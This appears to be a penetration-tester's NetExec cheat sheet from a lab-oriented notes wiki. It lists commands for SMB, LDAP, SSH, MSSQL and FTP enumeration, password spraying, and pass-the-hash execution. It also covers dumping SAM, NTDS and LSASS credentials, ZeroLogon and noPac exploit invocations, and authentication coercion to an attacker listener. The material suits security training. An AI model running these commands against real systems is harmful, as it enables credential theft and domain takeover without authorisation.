NetExec

NetExec (nxc) is a network service exploitation tool that helps automate assessing the security of large networks. Check out its amazing and ever-evolving wiki page! You can view its usage in almost any of the AD-related boxes.

SMB

Enumeration

Enumerate domain/local users:

# List domain users
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --users
# List local users
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --users --local-auth

# Create a users list from nxc's output
$ nxc smb <target> -u <user> -p <pass> --users | awk '$1 == "SMB" && $5 != "[+]" && $5 != "-Username-" && $5 != "[*]" && $5 != "Guest" && $5 != "krbtgt" {print $5}' > domain_users

Domain users can be also be enumerated via a RID-bruteforcing attack:

# Brute-force RIDs (default up to 4000)
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --rid-brute <max-rid>
# Create a users list from nxc's output
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --rid-brute <max-rid> > nxc_users
cat nxc_users | awk '{print $6}' | awk -F'\' '{print $2}' > domain_users

Enumerate domain/local hosts:

# List domain hosts
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --computers
# List local hosts
nxc smb <TARGET-IP> -u '<USER>' -p '<PASS>' --computers --local-auth

# List SMB shares
nxc smb <TARGET-IP> --shares
# List SMB shares via a NULL session
nxc smb <TARGET-IP> -p '' -u '' --shares
# List SMB shares via a guest session
nxc smb <TARGET-IP> -p 'guest' -u '' --shares
# List SMB shares via an anonymous session
nxc smb <TARGET-IP> -p 'anonymous' -u '' --shares

Password Spray

$ nxc smb <target> -u <user> -p <pass> -d <domain> --continue-on-success

If the results include the domain , e.g. (seruca.yzx) → a domain account.

...
SMB 192.168.X.97  445 DC01   [+] secura.yzx\bob:Pass123!

If it has (Pw3d!) at the end → Local Administrator account.

...
SMB 192.168.X.95 445 SECURE [+] secura.yzx\bob:Pass123! (Pwn3d!)

RCE

NetExec uses impacket-psexec to perform the Pass-the-Hash attack:

nxc smb <target> -u <user> --H <hash> -X <command>

Spidering

# Only spider files, enable file content searching
nxc smb <ip> -u <user> -p <pass> --spider <share> --only-files --content

# Spider a specific directory
nxc smb <ip> -u <user> -p <pass> --spider <share> --spider-folder <folder>

Upload/Download

If large files are failing/erroring, add --smb-timeout with a value than 2.

nxc smb <ip> -u <user> -p <pass> --share <share> --get-file <\\path\\to\\file> <local-file>

Modules

For stealing hashes via writeable shares via SMB using slinky, drop-sc, or scuffy check here.

# SAM
nxc smb <ip> -u <user> -p <pass> --sam

# NTDS
nxc smb <ip> -u <user> -p <pass> --ntds --user <user>

# LSA
nxc smb <ip> -u <user> -p <pass> --lsa

The hash format that starts with $DCC2$ (derived from --lsa) is stronger than NTLM and cannot be used for a PtH attack. For attempting to crack them, the domain and username needs to be removed; only the value starting with $DCC2$ is required.

# Convert DCC2 hashes
$ cat MS01_10.129.204.133_2022-11-08_093944.cached| cut -d ":" -f 2
$DCC2$10240#julio#c2139497f24725b345aa1e23352481f3
$DCC2$10240#david#a8338587a1c6ee53624372572e39b93f
$DCC2$10240#john#fbdeac2c1d121818f75796cedd0caf0a

# Crack hashes
hashcat -m2100 hashes.txt /usr/share/wordlists/rockyou.txt

Locate the configuration file:

nxc smb <ip> -u <user> -p <pass> -M keepass_discover

Check for credentials:

nxc smb <ip> -u <user> -p <pass> -M keepass_trigger -o ACTION=ALL KEEPASS_CONFIG_PATH=C:/Users/julio/AppData/Roaming/KeePass/KeePass.config.xml

Check /tmp/export.xml after.

Retrieve the plaintext password for accounts pushed through GPPs:

nxc smb <ip> -u <user> -p <pass> -M gpp_password

Search for registry.xml files for autologin information:

nxc smb <ip> -u <user> -p <pass> -M gpp_autologin

Python-based, uses impacket to read the LSASS dump and pypykatz to extract credentials:

nxc smb <ip> -u <user> -p <pass> -M lsassy

Uses the Sysinternals procdump to create the LSASS dump and pypykatz to extract credentials:

nxc smb <ip> -u <user> -p <pass> -M procdump

Uses clone handles to create an obfuscated dump:

nxc smb <ip> -u <user> -p <pass> -M handlekatz

Opening a handle to LSASS can be detected, so it searches for existing handles, and if one is found, it copies it and creates a LSASS minidump:

nxc smb <ip> -u <user> -p <pass> -M nanodump

Vulnerabilities

The most critical vulnerabilities: from no creds/low privileges straight to DA !

Check for all at once:

$ nxc smb dc01 -u <user> -p <pass> -M zerologon -M nopac -M printnightmare -M smbghost -M ms17-010

ZeroLogon (CVE-2020-1472) is a vulnerability in Microsoft’s Netlogon protocol that lets an attacker with network access spoof a DC, reset its password to blank, and gain full domain admin rights—without any credentials.

# Check for the vulnerability
nxc smb <dc-ip> -u '' -p '' -M zerologon

There is a PoC available:

# Exploit
./cve-2020-1472-exploit.py <DC-netBIOS-name> <dc-ip>

# Dump the administrator's hash
$ impacket-secretsdump -just-dc -no-pass <DC-netBIOS-name>\$@<dc-ip> -just-dc-user administrator

# Restore password
./restorepassword.py <DC-netBIOS-name>@<DC-IP> -target-ip <DC-IP> -hexpass <plaintext-machine-password>

noPAC is a vulnerability that lets an attacker with low-privileged domain access abuse misconfigured delegation and Kerberos to impersonate DCs and gain Domain Admin rights by forging a Privileged Attribute Certificate (PAC).

# Check for the vulnerability
$ nxc smb dc01 -u <user> -p <pass> -M nopac

There is a PoC available:

# Get the ST
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203

# Get RCE
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 -shell --impersonate administrator

# Dump hash
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump

python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump -just-dc-user cgdomain/krbtgt

PrintNightmare is a critical Windows Print Spooler vulnerability that allows an attacker with network or local access to execute code as SYSTEM on a DC or any Windows machine, enabling full takeover of the system and often the entire domain.

# Check for the vulnerability
nxc smb <ip> -u '' -p '' -M printnightmare

SMBGhost (CVE-2020-0796) is a critical vulnerability in the SMBv3 protocol that lets an attacker remotely execute code on vulnerable Windows systems by sending specially crafted packets, allowing full control without authentication. It targets any SMBv3-enabled host on the network, including DCs.

# Check for the vulnerability
nxc smb <ip> -u '' -p '' -M smbghost

MS17-010 is a critical Windows SMB vulnerability, aka EternalBlue, that allows remote attackers to execute code on vulnerable systems without authentication by exploiting flaws in SMBv1. It targets any SMBv1-enabled Windows host, including DCs, enabling full system takeover.

# Check for the vulnerability
nxc smb <ip> -u '' -p '' -M ms17-010

Checks for coerce vulnerabilities. By default the LISTENER ip will be set to localhost, so no traffic will appear on the network.

The coerce_plus module includes:

PetitPotam: Coerces a DC to authenticate to an attacker via MS-EFSRPC, enabling NTLM relay attacks for domain takeover.
DFSCoerce: Tricks a DC into authenticating to the attacker via the Distributed File System service, enabling relay attacks.
PrinterBug: Exploits Windows Print Spooler to coerce authentication and enable NTLM relay attacks.
MSEven: Uses the Microsoft Exchange’s Web Services to force authentication, facilitating NTLM relay and privilege escalation.
ShadowCoerce: Coerces a domain host to authenticate by abusing the Shadow Copy service, enabling relay attacks.

# Check for the vulnerabilities
$ nxc smb dc01 -u <user> -p <pass> -M coerce_plus

If one or more are found, set the listener:

# Run all exploit methods at once
nxc smb <ip> -u '' -p '' -M coerce_plus -o LISTENER=<attacker-ip> ALWAYS=true

# Run a specific method
$ nxc smb dc01 -u <user> -p <pass> -M coerce_plus -o M=DFSCoerce L=<attacker-ip> ALWAYS=true

LDAP

Enumerate the description field of domain users (get-desc-users):

# Enumerate all users
nxc ldap DC01 -u '' -p '' -M get-desc-users

# Filter for a target string
nxc ldap DC01 -u '' -p '' -M get-desc-users -o FILTER='string'

# Look for passwords
nxc ldap DC01 -u '' -p '' -M get-desc-users -o PASSWORDPOLICY=True MINLENGTH=8

Execute the whoami command for any domain user:

nxc ldap dc01 -u x7331 -p Pass123! -M whoami -o USER=x1337

Obtain the domain's SID:

nxc ldap DC01 -u x7331 -p Pass123! --get-sid

nxc ldap <ip> -u <user> -p <pass> -M daclread -o TARGET=<user> ACTION=read

# DCSync rights
nxc ldap <ip> -u <user> -p <pass> -M daclread -o TARGET_DN="DC=inlanefreight,DC=htb" ACTION=read RIGHTS=DCSync

SSH

# Password authentication
nxc ssh <target> -u <user> -p <pass>

# Key authentication
nxc ssh <target> -u <user> -p '' --key-file root_id_rsa

# Port specification
nxc ssh <target> -u <user> -p <pass> --port 2222

MSSQL

Two methods can be used to authenticate to MSSQL: Windows (default) & local auth:

# 1. Windows auth

# With SMB port open
nxc mssql <target> -u <user> -p <pass>

# With SMB port closed
nxc mssql <target> -u <user> -p <pass> -d <domain>

# 2. Local auth
nxc mssql <target> -u <user> -p <pass> --local-auth

Ports can be also be specified:

nxc mssql <target> -u <user> -p <pass> --port <port>

From standard user to DBA:

# Check if possible
nxc mssql <ip> -u user -p password -M mssql_priv

# Impersonate
nxc mssql <ip> -u user -p password -M mssql_priv -o ACTION=privesc

# Rollback
nxc mssql <ip> -u user -p password -M mssql_priv -o ACTION=rollback

# Remote queries
nxc mssql <target> -u <user> -p <pass> --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'

# System RCE via xp_cmdshell
nxc mssql <target> -u <user> -p <pass> --local-auth -x whoami

# Upload
nxc mssql <target> -u <user> -p <pass> --put-file /tmp/users C:\\Windows\\Temp\\whoami.txt

# Download
nxc mssql <target> -u <user> -p <pass> --get-file C:\\Windows\\Temp\\whoami.txt /tmp/file

FTP

nxc ftp <target> -u userfile -p passwordfile --no-bruteforce --continue-on-success

Resources

A nice short demnostration of nxc's usage (video)
The amazing CME-based academy module from Hack The Box (module)

PreviousMimikatz NextPowerView

Last updated 5 months ago

hashtagSMB

hashtagEnumeration

hashtagPassword Spray

hashtagRCE

hashtagSpidering

hashtagUpload/Download

hashtagModules

hashtagVulnerabilities

hashtagLDAP

hashtagSSH

hashtagMSSQL

hashtagFTP

hashtagResources

SMB